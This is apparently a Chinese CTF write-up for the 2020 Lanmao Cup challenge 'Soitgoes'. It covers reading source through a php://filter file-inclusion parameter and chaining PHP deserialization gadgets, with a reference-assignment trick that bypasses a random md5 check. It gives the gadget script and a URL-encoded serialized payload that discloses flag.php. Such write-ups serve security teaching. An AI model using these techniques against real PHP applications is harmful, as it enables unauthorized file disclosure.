[藍(lán)帽杯2020第四屆 線上賽]Soitgoes

題目
php反序列化,pop構(gòu)造,常規(guī)題
過(guò)程
1.index.php頁(yè)面右鍵查看源碼,感覺(jué)要用php偽協(xié)議去讀try.php

圖片.png

2.?file=php://filter/read=convert.base64-encode/resource=這次沒(méi)有過(guò)濾,直接讀到
index.php
圖片.png

try.php

<?php
class Seri{
    public $alize;
    public function __construct($alize) {
        $this->alize = $alize;
    }
    public function __destruct(){
        $this->alize->getFlag();
    }
}

class Flag{
    public $f;
    public $t1;
    public $t2;

    function __construct($file){
        $this->f = $file;
        $this->t1 = $this->t2 = md5(rand(1,10000));
    }

    public function getFlag(){
        $this->t2 = md5(rand(1,10000));
        echo $this->t1;
        echo $this->t2;
        if($this->t1 === $this->t2)
        {
            if(isset($this->f)){
                echo @highlight_file($this->f,true);
            }
        }
    }
}

3.尋找pop鏈
Seri類中的魔法函數(shù)__destruct()使用getFlag()方法,F(xiàn)lag類中的getFlag()定義該方法。
構(gòu)造一個(gè)Flag類型的變量,傳入的參數(shù)為flag.php。$Flag=new Flag('flag.php');
構(gòu)造一個(gè)Seri類型的變量,傳入的參賽為$Flag,這樣銷(xiāo)毀$Flag的時(shí)候,就會(huì)調(diào)用__destruct()。$test=new Seri($Flag)
在getFlag()方法中還有一個(gè)md5判斷,要使t1,t2值相等才可,其實(shí)不用。直接使用php的引用賦值即可。

a=1;
b=&a;
a=a+1;

那末最后b得值也會(huì)變?yōu)?,因?yàn)閎是引用賦值。所以最終$Flag->t1 = &$Flag->t2;
最終payload

<?php
class Seri{
    public $alize;
    public function __construct($alize) {
        $this->alize = $alize;
    }
    public function __destruct(){
        $this->alize->getFlag();
    }
}

class Flag{
    public $f;
    public $t1;
    public $t2;

    function __construct($file){
        $this->f = $file;
        $this->t1 = $this->t2 = md5(rand(1,10000));
    }

    public function getFlag(){
        $this->t2 = md5(rand(1,10000));
        echo $this->t1;
        echo $this->t2;
        if($this->t1 === $this->t2)
        {
            if(isset($this->f)){
                echo @highlight_file($this->f,true);
            }
        }
    }
}
$Flag=new Flag('flag.php');
$Flag->t1 = &$Flag->t2;
$test = new Seri($Flag);
echo urlencode(serialize($test));
?>
圖片.png

O%3A4%3A%22Seri%22%3A1%3A%7Bs%3A5%3A%22alize%22%3BO%3A4%3A%22Flag%22%3A3%3A%7Bs%3A1%3A%22f%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A2%3A%22t1%22%3Bs%3A32%3A%224a2ddf148c5a9c42151a529e8cbdcc06%22%3Bs%3A2%3A%22t2%22%3BR%3A4%3B%7D%7D0a49e3c3a03ebde64f85c0bacd8a08e20a49e3c3a03ebde64f85c0bacd8a08e2
4.只是這樣還不行,觀察index.php,反序列化后傳給p。
最終payload:

url/?file=try.php&p=O%3A4%3A"Seri"%3A1%3A{s%3A5%3A"alize"%3BO%3A4%3A"Flag"%3A3%3A{s%3A1%3A"f"%3Bs%3A8%3A"flag.php"%3Bs%3A2%3A"t1"%3Bs%3A32%3A"8e98d81f8217304975ccb23337bb5761"%3Bs%3A2%3A"t2"%3BR%3A4%3B}}6e17a5fd135fcaf4b49f2860c2474c7c6e17a5fd135fcaf4b49f2860c2474c7c
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

友情鏈接更多精彩內(nèi)容